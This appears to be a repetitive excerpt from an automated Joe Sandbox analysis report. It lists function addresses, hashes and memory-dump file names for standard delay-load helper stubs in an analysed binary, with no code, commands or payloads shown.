Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 41d0cbec9ead5b85ed3992bbfd62b97d6fa6933e65db56e8684a0439afcafe43
Instruction ID: 878b0efd24bda34eb2c49fc977d95ab011cd8a1fbcad2fda6b84bd6b4860ae74
Opcode Fuzzy Hash: 41d0cbec9ead5b85ed3992bbfd62b97d6fa6933e65db56e8684a0439afcafe43
Instruction Fuzzy Hash: 82A001E66ED24ABC712866526D06D7B422ED4C5BB13308D2EFA17C44A1A89468851A71

Function 009FE291 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: d485a18a34a1515b611e8b6f3a7a0bcb308615b8d4d2e3d8c711d3f1c3ff579c
Instruction ID: 878b0efd24bda34eb2c49fc977d95ab011cd8a1fbcad2fda6b84bd6b4860ae74
Opcode Fuzzy Hash: d485a18a34a1515b611e8b6f3a7a0bcb308615b8d4d2e3d8c711d3f1c3ff579c
Instruction Fuzzy Hash: 82A001E66ED24ABC712866526D06D7B422ED4C5BB13308D2EFA17C44A1A89468851A71

Function 009FE2B9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8491e0229dd1e8a6ffc710c64e8f32a2f7ee1157341f5fd1c40b54c657b8d06a
Instruction ID: 878b0efd24bda34eb2c49fc977d95ab011cd8a1fbcad2fda6b84bd6b4860ae74
Opcode Fuzzy Hash: 8491e0229dd1e8a6ffc710c64e8f32a2f7ee1157341f5fd1c40b54c657b8d06a
Instruction Fuzzy Hash: 82A001E66ED24ABC712866526D06D7B422ED4C5BB13308D2EFA17C44A1A89468851A71

Function 009FE2AF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 4ad07f6346b3e41d450b74bff4fcd5ee6f472c382370a126759235ee4ad04d34
Instruction ID: 878b0efd24bda34eb2c49fc977d95ab011cd8a1fbcad2fda6b84bd6b4860ae74
Opcode Fuzzy Hash: 4ad07f6346b3e41d450b74bff4fcd5ee6f472c382370a126759235ee4ad04d34
Instruction Fuzzy Hash: 82A001E66ED24ABC712866526D06D7B422ED4C5BB13308D2EFA17C44A1A89468851A71

Function 009FE2A5 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 877811c5c1e523439ddbc4ed35db7f73b424fa952bab2e210e04d29e3301b1af
Instruction ID: 878b0efd24bda34eb2c49fc977d95ab011cd8a1fbcad2fda6b84bd6b4860ae74
Opcode Fuzzy Hash: 877811c5c1e523439ddbc4ed35db7f73b424fa952bab2e210e04d29e3301b1af
Instruction Fuzzy Hash: 82A001E66ED24ABC712866526D06D7B422ED4C5BB13308D2EFA17C44A1A89468851A71

Function 009FE2D7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b411e1d169d6133f1d94f8ddb37e5343610fb2e68a4c4798f2378235ac6fc061
Instruction ID: 878b0efd24bda34eb2c49fc977d95ab011cd8a1fbcad2fda6b84bd6b4860ae74
Opcode Fuzzy Hash: b411e1d169d6133f1d94f8ddb37e5343610fb2e68a4c4798f2378235ac6fc061
Instruction Fuzzy Hash: 82A001E66ED24ABC712866526D06D7B422ED4C5BB13308D2EFA17C44A1A89468851A71

Function 009FE2CD Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ff8115259387f16bf26aa335838cdf4aad1650f270ed317b6ae7f2b61503a3bf
Instruction ID: 878b0efd24bda34eb2c49fc977d95ab011cd8a1fbcad2fda6b84bd6b4860ae74
Opcode Fuzzy Hash: ff8115259387f16bf26aa335838cdf4aad1650f270ed317b6ae7f2b61503a3bf
Instruction Fuzzy Hash: 82A001E66ED24ABC712866526D06D7B422ED4C5BB13308D2EFA17C44A1A89468851A71

Function 009FE2C3 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a7d69b8b02795e2ec4a25c56a1a4fe6ae84d6bf765d5ff6ecb1fd804be664d52
Instruction ID: 878b0efd24bda34eb2c49fc977d95ab011cd8a1fbcad2fda6b84bd6b4860ae74
Opcode Fuzzy Hash: a7d69b8b02795e2ec4a25c56a1a4fe6ae84d6bf765d5ff6ecb1fd804be664d52
Instruction Fuzzy Hash: 82A001E66ED24ABC712866526D06D7B422ED4C5BB13308D2EFA17C44A1A89468851A71

Function 009FE219 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 655b8fd0e1add828efdf5b62a436c3412a3251d74fb01a019e2ee0f5bd8c6c6c
Instruction ID: 878b0efd24bda34eb2c49fc977d95ab011cd8a1fbcad2fda6b84bd6b4860ae74
Opcode Fuzzy Hash: 655b8fd0e1add828efdf5b62a436c3412a3251d74fb01a019e2ee0f5bd8c6c6c
Instruction Fuzzy Hash: 82A001E66ED24ABC712866526D06D7B422ED4C5BB13308D2EFA17C44A1A89468851A71

Function 009FE25F Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b22054499eaa226d90d1e782759fc363df549186f0819b26260ed510d19e4567
Instruction ID: 878b0efd24bda34eb2c49fc977d95ab011cd8a1fbcad2fda6b84bd6b4860ae74
Opcode Fuzzy Hash: b22054499eaa226d90d1e782759fc363df549186f0819b26260ed510d19e4567
Instruction Fuzzy Hash: 82A001E66ED24ABC712866526D06D7B422ED4C5BB13308D2EFA17C44A1A89468851A71

Function 009FE27D Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE1E3

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c35ee8279c01f1866c2aec1c2cfeee26fb5521e1fe6aed6be7269fd2bb0da9e8
Instruction ID: 878b0efd24bda34eb2c49fc977d95ab011cd8a1fbcad2fda6b84bd6b4860ae74
Opcode Fuzzy Hash: c35ee8279c01f1866c2aec1c2cfeee26fb5521e1fe6aed6be7269fd2bb0da9e8
Instruction Fuzzy Hash: 82A001E66ED24ABC712866526D06D7B422ED4C5BB13308D2EFA17C44A1A89468851A71

Function 009FE3EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE3FC

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 253f1ab5642a807bf15e21618a4e8ff2f4015751b42f607f5bc0a3b83fafa887
Instruction ID: e6cff69776b0ac19b0ec0ea81ee76f69d83a31057fc08aacd176674424b59a75
Opcode Fuzzy Hash: 253f1ab5642a807bf15e21618a4e8ff2f4015751b42f607f5bc0a3b83fafa887
Instruction Fuzzy Hash: F8A011EA2A828A3C300822002C0AC3B022CC0C0B30330A82EFA22A00A0AC8008800A32

Function 009FE414 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE3FC

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: ca96032eafe6e9657a59d93bf7d4264cf670b96b71f309a391eb7842728e97a8
Instruction ID: bddbcd428970e3e7b739d3383eff2b345d0e05df7d0a2ae4afb12a9f5935ad0d
Opcode Fuzzy Hash: ca96032eafe6e9657a59d93bf7d4264cf670b96b71f309a391eb7842728e97a8
Instruction Fuzzy Hash: 90A011EA2A828ABC300822002C0AC3B022CC0C0BB0330AC2EFA22800A0A88008800A32

Function 009FE40A Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE3FC

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c42b9c36ee8d3e43aa8e9b7f1b743025e36eee290b5abd3848c498ac8d786f73
Instruction ID: bddbcd428970e3e7b739d3383eff2b345d0e05df7d0a2ae4afb12a9f5935ad0d
Opcode Fuzzy Hash: c42b9c36ee8d3e43aa8e9b7f1b743025e36eee290b5abd3848c498ac8d786f73
Instruction Fuzzy Hash: 90A011EA2A828ABC300822002C0AC3B022CC0C0BB0330AC2EFA22800A0A88008800A32

Function 009FE43C Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE3FC

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: b99f59e8b75c7fe2581afec44204f552d2e2c896ddd556339b85216c1df4a0a3
Instruction ID: bddbcd428970e3e7b739d3383eff2b345d0e05df7d0a2ae4afb12a9f5935ad0d
Opcode Fuzzy Hash: b99f59e8b75c7fe2581afec44204f552d2e2c896ddd556339b85216c1df4a0a3
Instruction Fuzzy Hash: 90A011EA2A828ABC300822002C0AC3B022CC0C0BB0330AC2EFA22800A0A88008800A32

Function 009FE432 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE3FC

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 2e81cc2d1ac34537a4c46cc9626329124d35b732e59e2385cd4fa4be0487def6
Instruction ID: bddbcd428970e3e7b739d3383eff2b345d0e05df7d0a2ae4afb12a9f5935ad0d
Opcode Fuzzy Hash: 2e81cc2d1ac34537a4c46cc9626329124d35b732e59e2385cd4fa4be0487def6
Instruction Fuzzy Hash: 90A011EA2A828ABC300822002C0AC3B022CC0C0BB0330AC2EFA22800A0A88008800A32

Function 009FE446 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE3FC

Part of subcall function 009FE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009FE8D0
Part of subcall function 009FE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009FE8E1

Memory Dump Source

Source File: 00000000.00000002.2114799249.00000000009E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009E0000, based on PE: true

Associated: 00000000.00000002.2114752743.00000000009E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114846356.0000000000A13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A25000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114875141.0000000000A42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2114956496.0000000000A43000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_9e0000_DC86.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: c73259f263f0202c108f4b699c1e63e20dd0d13e8a112b56c9fb903c2f024848
Instruction ID: bddbcd428970e3e7b739d3383eff2b345d0e05df7d0a2ae4afb12a9f5935ad0d
Opcode Fuzzy Hash: c73259f263f0202c108f4b699c1e63e20dd0d13e8a112b56c9fb903c2f024848
Instruction Fuzzy Hash: 90A011EA2A828ABC300822002C0AC3B022CC0C0BB0330AC2EFA22800A0A88008800A32

Function 009FE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 009FE580

